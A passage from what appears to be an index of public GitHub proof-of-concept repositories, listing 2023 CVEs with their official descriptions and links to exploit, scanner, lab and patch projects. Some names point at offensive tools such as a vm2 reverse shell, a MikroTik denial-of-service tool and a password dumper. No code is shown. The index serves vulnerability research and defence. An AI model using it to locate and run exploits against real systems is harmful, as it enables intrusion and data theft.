- [duck-sec/CVE-2023-28252-Compiled-exe](https://github.com/duck-sec/CVE-2023-28252-Compiled-exe)
- [byt3n33dl3/CLFS](https://github.com/byt3n33dl3/CLFS)
- [Vulmatch/CVE-2023-28252](https://github.com/Vulmatch/CVE-2023-28252)
### CVE-2023-28324 (2023-06-30)
A improper input validation vulnerability exists in Ivanti Endpoint Manager 2022 and below that could allow privilege escalation or remote code execution.
- [horizon3ai/CVE-2023-28324](https://github.com/horizon3ai/CVE-2023-28324)
### CVE-2023-28329 (2023-03-23)
Insufficient validation of profile field availability condition resulted in an SQL injection risk (by default only available to teachers and managers).
- [cli-ish/CVE-2023-28329](https://github.com/cli-ish/CVE-2023-28329)
### CVE-2023-28330 (2023-03-23)
Insufficient sanitizing in backup resulted in an arbitrary file read risk. The capability to access this feature is only available to teachers, managers and admins by default.
- [cli-ish/CVE-2023-28330](https://github.com/cli-ish/CVE-2023-28330)
### CVE-2023-28343 (2023-03-14)
OS command injection affects Altenergy Power Control Software C1.2.5 via shell metacharacters in the index.php/management/set_timezone timezone parameter, because of set_timezone in models/management_model.php.
- [gobysec/CVE-2023-28343](https://github.com/gobysec/CVE-2023-28343)
- [superzerosec/CVE-2023-28343](https://github.com/superzerosec/CVE-2023-28343)
- [hba343434/CVE-2023-28343](https://github.com/hba343434/CVE-2023-28343)
### CVE-2023-28432 (2023-03-22)
Minio is a Multi-Cloud Object Storage framework. In a cluster deployment starting with RELEASE.2019-12-17T23-16-33Z and prior to RELEASE.2023-03-20T20-16-18Z, MinIO returns all environment variables, including `MINIO_SECRET_KEY`\nand `MINIO_ROOT_PASSWORD`, resulting in information disclosure. All users of distributed deployment are impacted. All users are advised to upgrade to RELEASE.2023-03-20T20-16-18Z.
- [Mr-xn/CVE-2023-28432](https://github.com/Mr-xn/CVE-2023-28432)
- [gobysec/CVE-2023-28432](https://github.com/gobysec/CVE-2023-28432)
- [Okaytc/minio_unauth_check](https://github.com/Okaytc/minio_unauth_check)
- [MzzdToT/CVE-2023-28432](https://github.com/MzzdToT/CVE-2023-28432)
- [acheiii/CVE-2023-28432](https://github.com/acheiii/CVE-2023-28432)
- [steponeerror/Cve-2023-28432-](https://github.com/steponeerror/Cve-2023-28432-)
- [Cuerz/CVE-2023-28432](https://github.com/Cuerz/CVE-2023-28432)
- [LHXHL/Minio-CVE-2023-28432](https://github.com/LHXHL/Minio-CVE-2023-28432)
- [h0ng10/CVE-2023-28432_docker](https://github.com/h0ng10/CVE-2023-28432_docker)
- [CHINA-china/MinIO_CVE-2023-28432_EXP](https://github.com/CHINA-china/MinIO_CVE-2023-28432_EXP)
- [TaroballzChen/CVE-2023-28432-metasploit-scanner](https://github.com/TaroballzChen/CVE-2023-28432-metasploit-scanner)
- [bingtangbanli/CVE-2023-28432](https://github.com/bingtangbanli/CVE-2023-28432)
- [Chocapikk/CVE-2023-28432](https://github.com/Chocapikk/CVE-2023-28432)
- [yTxZx/CVE-2023-28432](https://github.com/yTxZx/CVE-2023-28432)
- [unam4/CVE-2023-28432-minio_update_rce](https://github.com/unam4/CVE-2023-28432-minio_update_rce)
- [C1ph3rX13/CVE-2023-28432](https://github.com/C1ph3rX13/CVE-2023-28432)
- [netuseradministrator/CVE-2023-28432](https://github.com/netuseradministrator/CVE-2023-28432)
- [xk-mt/CVE-2023-28432](https://github.com/xk-mt/CVE-2023-28432)
- [0xRulez/CVE-2023-28432](https://github.com/0xRulez/CVE-2023-28432)
### CVE-2023-28434 (2023-03-22)
Minio is a Multi-Cloud Object Storage framework. Prior to RELEASE.2023-03-20T20-16-18Z, an attacker can use crafted requests to bypass metadata bucket name checking and put an object into any bucket while processing `PostPolicyBucket`. To carry out this attack, the attacker requires credentials with `arn:aws:s3:::*` permission, as well as enabled Console API access. This issue has been patched in RELEASE.2023-03-20T20-16-18Z. As a workaround, enable browser API access and turn off `MINIO_BROWSER=off`. \n
- [AbelChe/evil_minio](https://github.com/AbelChe/evil_minio)
### CVE-2023-28447 (2023-03-28)
Smarty is a template engine for PHP. In affected versions smarty did not properly escape javascript code. An attacker could exploit this vulnerability to execute arbitrary JavaScript code in the context of the user's browser session. This may lead to unauthorized access to sensitive user data, manipulation of the web application's behavior, or unauthorized actions performed on behalf of the user. Users are advised to upgrade to either version 3.1.48 or to 4.3.1 to resolve this issue. There are no known workarounds for this vulnerability.
- [drkbcn/lblfixer_cve_2023_28447](https://github.com/drkbcn/lblfixer_cve_2023_28447)
### CVE-2023-28467 (2023-05-22)
In MyBB before 1.8.34, there is XSS in the User CP module via the user email field.
- [ahmetaltuntas/CVE-2023-28467](https://github.com/ahmetaltuntas/CVE-2023-28467)
### CVE-2023-28588 (2023-12-05)
Transient DOS in Bluetooth Host while rfc slot allocation.
- [uthrasri/CVE-2023-28588](https://github.com/uthrasri/CVE-2023-28588)
- [Trinadh465/CVE-2023-28588](https://github.com/Trinadh465/CVE-2023-28588)
- [uthrasri/CVE-2023-28588_system_bt](https://github.com/uthrasri/CVE-2023-28588_system_bt)
- [uthrasri/CVE-2023-28588_Singlefile](https://github.com/uthrasri/CVE-2023-28588_Singlefile)
- [uthrasri/G2.5_CVE-2023-28588](https://github.com/uthrasri/G2.5_CVE-2023-28588)
- [uthrasri/CVE-2023-28588_G2.5_singlefile](https://github.com/uthrasri/CVE-2023-28588_G2.5_singlefile)
### CVE-2023-28753 (2023-05-18)
netconsd prior to v0.2 was vulnerable to an integer overflow in its parse_packet function. A malicious individual could leverage this overflow to create heap memory corruption with attacker controlled data.
- [pingjuiliao/CVE-2023-28753](https://github.com/pingjuiliao/CVE-2023-28753)
### CVE-2023-28771 (2023-04-25)
Improper error message handling in Zyxel ZyWALL/USG series firmware versions 4.60 through 4.73, VPN series firmware versions 4.60 through 5.35, USG FLEX series firmware versions 4.60 through 5.35, and ATP series firmware versions 4.60 through 5.35, which could allow an unauthenticated attacker to execute some OS commands remotely by sending crafted packets to an affected device.
- [benjaminhays/CVE-2023-28771-PoC](https://github.com/benjaminhays/CVE-2023-28771-PoC)
### CVE-2023-28772 (2023-03-23)
An issue was discovered in the Linux kernel before 5.13.3. lib/seq_buf.c has a seq_buf_putmem_hex buffer overflow.
- [Trinadh465/linux-4.1.15_CVE-2023-28772](https://github.com/Trinadh465/linux-4.1.15_CVE-2023-28772)
- [Satheesh575555/linux-4.1.15_CVE-2023-28772](https://github.com/Satheesh575555/linux-4.1.15_CVE-2023-28772)
- [hshivhare67/kernel_v4.1.15_CVE-2023-28772](https://github.com/hshivhare67/kernel_v4.1.15_CVE-2023-28772)
### CVE-2023-28810 (2023-06-15)
Some access control/intercom products have unauthorized modification of device network configuration vulnerabilities. Attackers can modify device network configuration by sending specific data packets to the vulnerable interface within the same local network.
- [skylightcyber/CVE-2023-28810](https://github.com/skylightcyber/CVE-2023-28810)
### CVE-2023-29007 (2023-04-25)
Git is a revision control system. Prior to versions 2.30.9, 2.31.8, 2.32.7, 2.33.8, 2.34.8, 2.35.8, 2.36.6, 2.37.7, 2.38.5, 2.39.3, and 2.40.1, a specially crafted `.gitmodules` file with submodule URLs that are longer than 1024 characters can used to exploit a bug in `config.c::git_config_copy_or_rename_section_in_file()`. This bug can be used to inject arbitrary configuration into a user's `$GIT_DIR/config` when attempting to remove the configuration section associated with that submodule. When the attacker injects configuration values which specify executables to run (such as `core.pager`, `core.editor`, `core.sshCommand`, etc.) this can lead to a remote code execution. A fix A fix is available in versions 2.30.9, 2.31.8, 2.32.7, 2.33.8, 2.34.8, 2.35.8, 2.36.6, 2.37.7, 2.38.5, 2.39.3, and 2.40.1. As a workaround, avoid running `git submodule deinit` on untrusted repositories or without prior inspection of any submodule sections in `$GIT_DIR/config`.
- [ethiack/CVE-2023-29007](https://github.com/ethiack/CVE-2023-29007)
- [omespino/CVE-2023-29007](https://github.com/omespino/CVE-2023-29007)
- [x-Defender/CVE-2023-29007_win-version](https://github.com/x-Defender/CVE-2023-29007_win-version)
### CVE-2023-29017 (2023-04-06)
vm2 is a sandbox that can run untrusted code with whitelisted Node's built-in modules. Prior to version 3.9.15, vm2 was not properly handling host objects passed to `Error.prepareStackTrace` in case of unhandled async errors. A threat actor could bypass the sandbox protections to gain remote code execution rights on the host running the sandbox. This vulnerability was patched in the release of version 3.9.15 of vm2. There are no known workarounds.
- [timb-machine-mirrors/seongil-wi-CVE-2023-29017](https://github.com/timb-machine-mirrors/seongil-wi-CVE-2023-29017)
- [passwa11/CVE-2023-29017-reverse-shell](https://github.com/passwa11/CVE-2023-29017-reverse-shell)
### CVE-2023-29084 (2023-04-13)
Zoho ManageEngine ADManager Plus before 7181 allows for authenticated users to exploit command injection via Proxy settings.
- [ohnonoyesyes/CVE-2023-29084](https://github.com/ohnonoyesyes/CVE-2023-29084)
### CVE-2023-29324 (2023-05-09)
Windows MSHTML Platform Security Feature Bypass Vulnerability
- [OLeDouxEt/CVE-2023-29324_Patch_Deploy](https://github.com/OLeDouxEt/CVE-2023-29324_Patch_Deploy)
### CVE-2023-29336 (2023-05-09)
Win32k Elevation of Privilege Vulnerability
- [m-cetin/CVE-2023-29336](https://github.com/m-cetin/CVE-2023-29336)
### CVE-2023-29343 (2023-05-09)
SysInternals Sysmon for Windows Elevation of Privilege Vulnerability
- [Wh04m1001/CVE-2023-29343](https://github.com/Wh04m1001/CVE-2023-29343)
### CVE-2023-29357 (2023-06-13)
Microsoft SharePoint Server Elevation of Privilege Vulnerability
- [Chocapikk/CVE-2023-29357](https://github.com/Chocapikk/CVE-2023-29357)
- [LuemmelSec/CVE-2023-29357](https://github.com/LuemmelSec/CVE-2023-29357)
- [KeyStrOke95/CVE-2023-29357-ExE](https://github.com/KeyStrOke95/CVE-2023-29357-ExE)
- [Guillaume-Risch/cve-2023-29357-Sharepoint](https://github.com/Guillaume-Risch/cve-2023-29357-Sharepoint)
- [Jev1337/CVE-2023-29357-Check](https://github.com/Jev1337/CVE-2023-29357-Check)
- [AhmedMansour93/Event-ID-189-Rule-Name-SOC227-CVE-2023-29357](https://github.com/AhmedMansour93/Event-ID-189-Rule-Name-SOC227-CVE-2023-29357)
### CVE-2023-29360 (2023-06-13)
Microsoft Streaming Service Elevation of Privilege Vulnerability
- [Nero22k/cve-2023-29360](https://github.com/Nero22k/cve-2023-29360)
- [0xDivyanshu-new/CVE-2023-29360](https://github.com/0xDivyanshu-new/CVE-2023-29360)
### CVE-2023-29384 (2023-12-20)
Unrestricted Upload of File with Dangerous Type vulnerability in HM Plugin WordPress Job Board and Recruitment Plugin – JobWP.This issue affects WordPress Job Board and Recruitment Plugin – JobWP: from n/a through 2.0.\n\n
- [nastar-id/CVE-2023-29384](https://github.com/nastar-id/CVE-2023-29384)
### CVE-2023-29406 (2023-07-11)
The HTTP/1 client does not fully validate the contents of the Host header. A maliciously crafted Host header can inject additional headers or entire requests. With fix, the HTTP/1 client now refuses to send requests containing an invalid Request.Host or Request.URL.Host value.
- [LuizGustavoP/EP3_Redes](https://github.com/LuizGustavoP/EP3_Redes)
### CVE-2023-29409 (2023-08-02)
Extremely large RSA keys in certificate chains can cause a client/server to expend significant CPU time verifying signatures. With fix, the size of RSA keys transmitted during handshakes is restricted to <= 8192 bits. Based on a survey of publicly trusted RSA keys, there are currently only three certificates in circulation with keys larger than this, and all three appear to be test certificates that are not actively deployed. It is possible there are larger keys in use in private PKIs, but we target the web PKI, so causing breakage here in the interests of increasing the default safety of users of crypto/tls seems reasonable.
- [mateusz834/CVE-2023-29409](https://github.com/mateusz834/CVE-2023-29409)
### CVE-2023-29439 (2023-05-16)
Unauth. Reflected Cross-Site Scripting (XSS) vulnerability in FooPlugins FooGallery plugin <= 2.2.35 versions.
- [LOURC0D3/CVE-2023-29439](https://github.com/LOURC0D3/CVE-2023-29439)
### CVE-2023-29478 (2023-04-07)
BiblioCraft before 2.4.6 does not sanitize path-traversal characters in filenames, allowing restricted write access to almost anywhere on the filesystem. This includes the Minecraft mods folder, which results in code execution.
- [Exopteron/BiblioRCE](https://github.com/Exopteron/BiblioRCE)
### CVE-2023-29489 (2023-04-27)
An issue was discovered in cPanel before 11.109.9999.116. XSS can occur on the cpsrvd error page via an invalid webcall ID, aka SEC-669. The fixed versions are 11.109.9999.116, 11.108.0.13, 11.106.0.18, and 11.102.0.31.
- [learnerboy88/CVE-2023-29489](https://github.com/learnerboy88/CVE-2023-29489)
- [xKore123/cPanel-CVE-2023-29489](https://github.com/xKore123/cPanel-CVE-2023-29489)
- [ipk1/CVE-2023-29489.py](https://github.com/ipk1/CVE-2023-29489.py)
- [Mostafa-Elguerdawi/CVE-2023-29489.yaml](https://github.com/Mostafa-Elguerdawi/CVE-2023-29489.yaml)
- [Mostafa-Elguerdawi/CVE-2023-29489](https://github.com/Mostafa-Elguerdawi/CVE-2023-29489)
- [whalebone7/EagleEye](https://github.com/whalebone7/EagleEye)
- [0-d3y/CVE-2023-29489](https://github.com/0-d3y/CVE-2023-29489)
- [Abdullah7-ma/CVE-2023-29489](https://github.com/Abdullah7-ma/CVE-2023-29489)
- [tucommenceapousser/CVE-2023-29489](https://github.com/tucommenceapousser/CVE-2023-29489)
- [tucommenceapousser/CVE-2023-29489.py](https://github.com/tucommenceapousser/CVE-2023-29489.py)
- [ViperM4sk/cpanel-xss-177](https://github.com/ViperM4sk/cpanel-xss-177)
- [S4muraiMelayu1337/CVE-2023-29489](https://github.com/S4muraiMelayu1337/CVE-2023-29489)
- [SynixCyberCrimeMy/CVE-2023-29489](https://github.com/SynixCyberCrimeMy/CVE-2023-29489)
- [Makurorororororororo/Validate-CVE-2023-29489-scanner-](https://github.com/Makurorororororororo/Validate-CVE-2023-29489-scanner-)
- [prasad-1808/tool-29489](https://github.com/prasad-1808/tool-29489)
- [mdaseem03/cpanel_xss_2023](https://github.com/mdaseem03/cpanel_xss_2023)
- [some-man1/CVE-2023-29489](https://github.com/some-man1/CVE-2023-29489)
- [Cappricio-Securities/CVE-2023-29489](https://github.com/Cappricio-Securities/CVE-2023-29489)
- [md-thalal/CVE-2023-29489](https://github.com/md-thalal/CVE-2023-29489)
### CVE-2023-29808 (2023-05-12)
Cross Site Scripting (XSS) vulnerability in vogtmh cmaps (companymaps) 8.0 allows attackers to execute arbitrary code.
- [zPrototype/CVE-2023-29808](https://github.com/zPrototype/CVE-2023-29808)
### CVE-2023-29809 (2023-05-12)
SQL injection vulnerability found in Maximilian Vogt companymaps (cmaps) v.8.0 allows a remote attacker to execute arbitrary code via a crafted script in the request.
- [zPrototype/CVE-2023-29809](https://github.com/zPrototype/CVE-2023-29809)
### CVE-2023-29839 (2023-05-03)
A Stored Cross Site Scripting (XSS) vulnerability exists in multiple pages of Hotel Druid version 3.0.4, which allows arbitrary execution of commands. The vulnerable fields are Surname, Name, and Nickname in the Document function.
- [jichngan/CVE-2023-29839](https://github.com/jichngan/CVE-2023-29839)
### CVE-2023-29919 (2023-05-23)
SolarView Compact <= 6.0 is vulnerable to Insecure Permissions. Any file on the server can be read or modified because texteditor.php is not restricted.
- [xiaosed/CVE-2023-29919](https://github.com/xiaosed/CVE-2023-29919)
### CVE-2023-29922 (2023-04-19)
PowerJob V4.3.1 is vulnerable to Incorrect Access Control via the create user/save interface.
- [CN016/Powerjob-CVE-2023-29922-](https://github.com/CN016/Powerjob-CVE-2023-29922-)
### CVE-2023-29923 (2023-04-19)
PowerJob V4.3.1 is vulnerable to Insecure Permissions. via the list job interface.
- [1820112015/CVE-2023-29923](https://github.com/1820112015/CVE-2023-29923)
- [3yujw7njai/CVE-2023-29923-Scan](https://github.com/3yujw7njai/CVE-2023-29923-Scan)
- [Le1a/CVE-2023-29923](https://github.com/Le1a/CVE-2023-29923)
### CVE-2023-29929 (2024-08-21)
Buffer Overflow vulnerability found in Kemptechnologies Loadmaster before v.7.2.60.0 allows a remote attacker to casue a denial of service via the libkemplink.so, isreverse library.
- [YSaxon/CVE-2023-29929](https://github.com/YSaxon/CVE-2023-29929)
### CVE-2023-29930 (2023-05-10)
An issue was found in Genesys CIC Polycom phone provisioning TFTP Server all version allows a remote attacker to execute arbitrary code via the login crednetials to the TFTP server configuration page.
- [YSaxon/TFTPlunder](https://github.com/YSaxon/TFTPlunder)
### CVE-2023-29983 (2023-05-12)
Cross Site Scripting vulnerability found in Maximilian Vogt cmaps v.8.0 allows a remote attacker to execute arbitrary code via the auditlog tab in the admin panel.
- [zPrototype/CVE-2023-29983](https://github.com/zPrototype/CVE-2023-29983)
### CVE-2023-30033
- [phucodeexp/CVE-2023-30033](https://github.com/phucodeexp/CVE-2023-30033)
### CVE-2023-30092 (2023-05-08)
SourceCodester Online Pizza Ordering System v1.0 is vulnerable to SQL Injection via the QTY parameter.
- [nawed20002/CVE-2023-30092](https://github.com/nawed20002/CVE-2023-30092)
### CVE-2023-30145 (2023-05-26)
Camaleon CMS v2.7.0 was discovered to contain a Server-Side Template Injection (SSTI) vulnerability via the formats parameter.
- [paragbagul111/CVE-2023-30145](https://github.com/paragbagul111/CVE-2023-30145)
### CVE-2023-30146 (2023-08-04)
Assmann Digitus Plug&View IP Camera HT-IP211HDP, version 2.000.022 allows unauthenticated attackers to download a copy of the camera's settings and the administrator credentials.
- [L1-0/CVE-2023-30146](https://github.com/L1-0/CVE-2023-30146)
### CVE-2023-30185 (2023-05-08)
CRMEB v4.4 to v4.6 was discovered to contain an arbitrary file upload vulnerability via the component \attachment\SystemAttachmentServices.php.
- [c7w1n/CVE-2023-30185](https://github.com/c7w1n/CVE-2023-30185)
### CVE-2023-30190
- [MojithaR/CVE-2023-30190-FOLLINA](https://github.com/MojithaR/CVE-2023-30190-FOLLINA)
### CVE-2023-30212 (2023-04-26)
OURPHP <= 7.2.0 is vulnerale to Cross Site Scripting (XSS) via /client/manage/ourphp_out.php.
- [kuttappu123/CVE-2023-30212-LAB](https://github.com/kuttappu123/CVE-2023-30212-LAB)
- [Rishipatidar/CVE-2023-30212-POC-DOCKER-FILE](https://github.com/Rishipatidar/CVE-2023-30212-POC-DOCKER-FILE)
- [mallutrojan/CVE-2023-30212-Lab](https://github.com/mallutrojan/CVE-2023-30212-Lab)
- [Anandhu990/CVE-2023-30212_lab](https://github.com/Anandhu990/CVE-2023-30212_lab)
- [libas7994/CVE-2023-30212](https://github.com/libas7994/CVE-2023-30212)
- [libasmon/Vulnerable-Docker-Environment-CVE-2023-30212](https://github.com/libasmon/Vulnerable-Docker-Environment-CVE-2023-30212)
- [libasmon/-create-a-vulnerable-Docker-environment-that-is-susceptible-to-CVE-2023-30212](https://github.com/libasmon/-create-a-vulnerable-Docker-environment-that-is-susceptible-to-CVE-2023-30212)
- [libasmon/Exploite-CVE-2023-30212-Vulnerability](https://github.com/libasmon/Exploite-CVE-2023-30212-Vulnerability)
- [libas7994/Exploit-the-CVE-2023-30212-vulnerability](https://github.com/libas7994/Exploit-the-CVE-2023-30212-vulnerability)
- [libasv/Exploite-CVE-2023-30212-vulnerability](https://github.com/libasv/Exploite-CVE-2023-30212-vulnerability)
- [kai-iszz/CVE-2023-30212](https://github.com/kai-iszz/CVE-2023-30212)
- [MaThEw-ViNcEnT/CVE-2023-30212-OURPHP-Vulnerability](https://github.com/MaThEw-ViNcEnT/CVE-2023-30212-OURPHP-Vulnerability)
- [arunsnap/CVE-2023-30212-POC](https://github.com/arunsnap/CVE-2023-30212-POC)
- [VisDev23/Vulnerable-Docker--CVE-2023-30212-](https://github.com/VisDev23/Vulnerable-Docker--CVE-2023-30212-)
- [AAsh035/CVE-2023-30212](https://github.com/AAsh035/CVE-2023-30212)
- [JasaluRah/Creating-a-Vulnerable-Docker-Environment-CVE-2023-30212-](https://github.com/JasaluRah/Creating-a-Vulnerable-Docker-Environment-CVE-2023-30212-)
### CVE-2023-30226 (2023-07-12)
An issue was discovered in function get_gnu_verneed in rizinorg Rizin prior to 0.5.0 verneed_entry allows attackers to cause a denial of service via crafted elf file.
- [ifyGecko/CVE-2023-30226](https://github.com/ifyGecko/CVE-2023-30226)
### CVE-2023-30253 (2023-05-29)
Dolibarr before 17.0.1 allows remote code execution by an authenticated user via an uppercase manipulation: <?PHP instead of <?php in injected data.
- [Rubikcuv5/cve-2023-30253](https://github.com/Rubikcuv5/cve-2023-30253)
- [04Shivam/CVE-2023-30253-Exploit](https://github.com/04Shivam/CVE-2023-30253-Exploit)
- [nikn0laty/Exploit-for-Dolibarr-17.0.0-CVE-2023-30253](https://github.com/nikn0laty/Exploit-for-Dolibarr-17.0.0-CVE-2023-30253)
- [g4nkd/CVE-2023-30253-PoC](https://github.com/g4nkd/CVE-2023-30253-PoC)
- [dollarboysushil/Dolibarr-17.0.0-Exploit-CVE-2023-30253](https://github.com/dollarboysushil/Dolibarr-17.0.0-Exploit-CVE-2023-30253)
- [andria-dev/DolibabyPhp](https://github.com/andria-dev/DolibabyPhp)
- [bluetoothStrawberry/CVE-2023-30253](https://github.com/bluetoothStrawberry/CVE-2023-30253)
### CVE-2023-30256 (2023-05-11)
Cross Site Scripting vulnerability found in Webkil QloApps v.1.5.2 allows a remote attacker to obtain sensitive information via the back and email_create parameters in the AuthController.php file.
- [ahrixia/CVE-2023-30256](https://github.com/ahrixia/CVE-2023-30256)
### CVE-2023-30258 (2023-06-23)
Command Injection vulnerability in MagnusSolution magnusbilling 6.x and 7.x allows remote attackers to run arbitrary commands via unauthenticated HTTP request.
- [gy741/CVE-2023-30258-setup](https://github.com/gy741/CVE-2023-30258-setup)
### CVE-2023-30347 (2023-06-22)
Cross Site Scripting (XSS) vulnerability in Neox Contact Center 2.3.9, via the serach_sms_api_name parameter to the SMA API search.
- [huzefa2212/CVE-2023-30347](https://github.com/huzefa2212/CVE-2023-30347)
### CVE-2023-30367 (2023-07-26)
Multi-Remote Next Generation Connection Manager (mRemoteNG) is free software that enables users to store and manage multi-protocol connection configurations to remotely connect to systems. mRemoteNG configuration files can be stored in an encrypted state on disk. mRemoteNG version <= v1.76.20 and <= 1.77.3-dev loads configuration files in plain text into memory (after decrypting them if necessary) at application start-up, even if no connection has been established yet. This allows attackers to access contents of configuration files in plain text through a memory dump and thus compromise user credentials when no custom password encryption key has been set. This also bypasses the connection configuration file encryption setting by dumping already decrypted configurations from memory.
- [S1lkys/CVE-2023-30367-mRemoteNG-password-dumper](https://github.com/S1lkys/CVE-2023-30367-mRemoteNG-password-dumper)
### CVE-2023-30383 (2023-07-18)
TP-LINK Archer C50v2 Archer C50(US)_V2_160801, TP-LINK Archer C20v1 Archer_C20_V1_150707, and TP-LINK Archer C2v1 Archer_C2_US__V1_170228 were discovered to contain a buffer overflow which may lead to a Denial of Service (DoS) when parsing crafted data.
- [a2ure123/CVE-2023-30383](https://github.com/a2ure123/CVE-2023-30383)
### CVE-2023-30458 (2023-04-24)
A username enumeration issue was discovered in Medicine Tracker System 1.0. The login functionality allows a malicious user to guess a valid username due to a different response time from invalid usernames. When one enters a valid username, the response time increases depending on the length of the supplied password.
- [d34dun1c02n/CVE-2023-30458](https://github.com/d34dun1c02n/CVE-2023-30458)
### CVE-2023-30459 (2023-04-14)
SmartPTT SCADA 1.1.0.0 allows remote code execution (when the attacker has administrator privileges) by writing a malicious C# script and executing it on the server (via server settings in the administrator control panel on port 8101, by default).
- [Toxich4/CVE-2023-30459](https://github.com/Toxich4/CVE-2023-30459)
### CVE-2023-30486
- [RandomRobbieBF/CVE-2023-30486](https://github.com/RandomRobbieBF/CVE-2023-30486)
### CVE-2023-30533 (2023-04-24)
SheetJS Community Edition before 0.19.3 allows Prototype Pollution via a crafted file. In other words. 0.19.2 and earlier are affected, whereas 0.19.3 and later are unaffected.
- [BenEdridge/CVE-2023-30533](https://github.com/BenEdridge/CVE-2023-30533)
### CVE-2023-30547 (2023-04-17)
vm2 is a sandbox that can run untrusted code with whitelisted Node's built-in modules. There exists a vulnerability in exception sanitization of vm2 for versions up to 3.9.16, allowing attackers to raise an unsanitized host exception inside `handleException()` which can be used to escape the sandbox and run arbitrary code in host context. This vulnerability was patched in the release of version `3.9.17` of `vm2`. There are no known workarounds for this vulnerability. Users are advised to upgrade.
- [rvizx/CVE-2023-30547](https://github.com/rvizx/CVE-2023-30547)
- [user0x1337/CVE-2023-30547](https://github.com/user0x1337/CVE-2023-30547)
- [Cur1iosity/CVE-2023-30547](https://github.com/Cur1iosity/CVE-2023-30547)
- [junnythemarksman/CVE-2023-30547](https://github.com/junnythemarksman/CVE-2023-30547)
### CVE-2023-30765 (2023-07-10)
\nDelta Electronics InfraSuite Device Master versions prior to 1.0.7 contain improper access controls that could allow an attacker to alter privilege management configurations, resulting in privilege escalation.\n\n
- [0xfml/CVE-2023-30765](https://github.com/0xfml/CVE-2023-30765)
### CVE-2023-30777 (2023-05-10)
Unauth. Reflected Cross-Site Scripting (XSS) vulnerability in WP Engine Advanced Custom Fields Pro, WP Engine Advanced Custom Fields plugins <= 6.1.5 versions.
- [Alucard0x1/CVE-2023-30777](https://github.com/Alucard0x1/CVE-2023-30777)
### CVE-2023-30800 (2023-09-07)
The web server used by MikroTik RouterOS version 6 is affected by a heap memory corruption issue. A remote and unauthenticated attacker can corrupt the server's heap memory by sending a crafted HTTP request. As a result, the web interface crashes and is immediately restarted. The issue was fixed in RouterOS 6.49.10 stable. RouterOS version 7 is not affected.\n
- [griffinsectio/CVE-2023-30800_PoC](https://github.com/griffinsectio/CVE-2023-30800_PoC)
- [griffinsectio/CVE-2023-30800_PoC_go](https://github.com/griffinsectio/CVE-2023-30800_PoC_go)
- [KhogenTheRabbit/cve-2023-30800-multithread-doser](https://github.com/KhogenTheRabbit/cve-2023-30800-multithread-doser)
- [AxthonyV/MikroTik](https://github.com/AxthonyV/MikroTik)
### CVE-2023-30839 (2023-04-25)
PrestaShop is an Open Source e-commerce web application. Versions prior to 8.0.4 and 1.7.8.9 contain a SQL filtering vulnerability. A BO user can write, update, and delete in the database, even without having specific rights. PrestaShop 8.0.4 and 1.7.8.9 contain a patch for this issue. There are no known workarounds.
- [drkbcn/lblfixer_cve_2023_30839](https://github.com/drkbcn/lblfixer_cve_2023_30839)
### CVE-2023-30845 (2023-04-26)
ESPv2 is a service proxy that provides API management capabilities using Google Service Infrastructure. ESPv2 2.20.0 through 2.42.0 contains an authentication bypass vulnerability. API clients can craft a malicious `X-HTTP-Method-Override` header value to bypass JWT authentication in specific cases.\n\nESPv2 allows malicious requests to bypass authentication if both the conditions are true: The requested HTTP method is **not** in the API service definition (OpenAPI spec or gRPC `google.api.http` proto annotations, and the specified `X-HTTP-Method-Override` is a valid HTTP method in the API service definition. ESPv2 will forward the request to your backend without checking the JWT. Attackers can craft requests with a malicious `X-HTTP-Method-Override` value that allows them to bypass specifying JWTs. Restricting API access with API keys works as intended and is not affected by this vulnerability.\n\nUpgrade deployments to release v2.43.0 or higher to receive a patch. This release ensures that JWT authentication occurs, even when the caller specifies `x-http-method-override`. `x-http-method-override` is still supported by v2.43.0+. API clients can continue sending this header to ESPv2.
- [himori123/-CVE-2023-30845](https://github.com/himori123/-CVE-2023-30845)
### CVE-2023-30854 (2023-04-28)
AVideo is an open source video platform. Prior to version 12.4, an OS Command Injection vulnerability in an authenticated endpoint `/plugin/CloneSite/cloneClient.json.php` allows attackers to achieve Remote Code Execution. This issue is fixed in version 12.4.
- [jmrcsnchz/CVE-2023-30854](https://github.com/jmrcsnchz/CVE-2023-30854)
### CVE-2023-30943 (2023-05-02)
The vulnerability was found Moodle which exists because the application allows a user to control path of the older to create in TinyMCE loaders. A remote user can send a specially crafted HTTP request and create arbitrary folders on the system.
- [d0rb/CVE-2023-30943](https://github.com/d0rb/CVE-2023-30943)
- [Chocapikk/CVE-2023-30943](https://github.com/Chocapikk/CVE-2023-30943)
- [RubyCat1337/CVE-2023-30943](https://github.com/RubyCat1337/CVE-2023-30943)
### CVE-2023-31070
- [bugprove/cve-2023-31070](https://github.com/bugprove/cve-2023-31070)
### CVE-2023-31290 (2023-04-27)
Trust Wallet Core before 3.1.1, as used in the Trust Wallet browser extension before 0.0.183, allows theft of funds because the entropy is 32 bits, as exploited in the wild in December 2022 and March 2023. This occurs because the mt19937 Mersenne Twister takes a single 32-bit value as an input seed, resulting in only four billion possible mnemonics. The affected versions of the browser extension are 0.0.172 through 0.0.182. To steal funds efficiently, an attacker can identify all Ethereum addresses created since the 0.0.172 release, and check whether they are Ethereum addresses that could have been created by this extension. To respond to the risk, affected users need to upgrade the product version and also move funds to a new wallet address.
- [ohexa/py_trustwallet_wasm](https://github.com/ohexa/py_trustwallet_wasm)
### CVE-2023-31320 (2023-11-14)
Improper input validation in the AMD RadeonTM Graphics display driver may allow an attacker to corrupt the display potentially resulting in denial of service.\n\n\n\n\n\n\n\n\n\n\n\n\n
- [whypet/CVE-2023-31320](https://github.com/whypet/CVE-2023-31320)
### CVE-2023-31346 (2024-02-13)
Failure to initialize\nmemory in SEV Firmware may allow a privileged attacker to access stale data\nfrom other guests.\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n
- [Freax13/cve-2023-31346-poc](https://github.com/Freax13/cve-2023-31346-poc)
### CVE-2023-31355 (2024-08-05)
Improper restriction of write operations in SNP firmware could allow a malicious hypervisor to overwrite a guest's UMC seed potentially allowing reading of memory from a decommissioned guest.
- [Freax13/cve-2023-31355-poc](https://github.com/Freax13/cve-2023-31355-poc)
### CVE-2023-31419 (2023-10-26)
A flaw was discovered in Elasticsearch, affecting the _search API that allowed a specially crafted query string to cause a Stack Overflow and ultimately a Denial of Service.\n\n\n\n\n
- [sqrtZeroKnowledge/Elasticsearch-Exploit-CVE-2023-31419](https://github.com/sqrtZeroKnowledge/Elasticsearch-Exploit-CVE-2023-31419)
- [u238/Elasticsearch-CVE-2023-31419](https://github.com/u238/Elasticsearch-CVE-2023-31419)
### CVE-2023-31433 (2023-05-02)
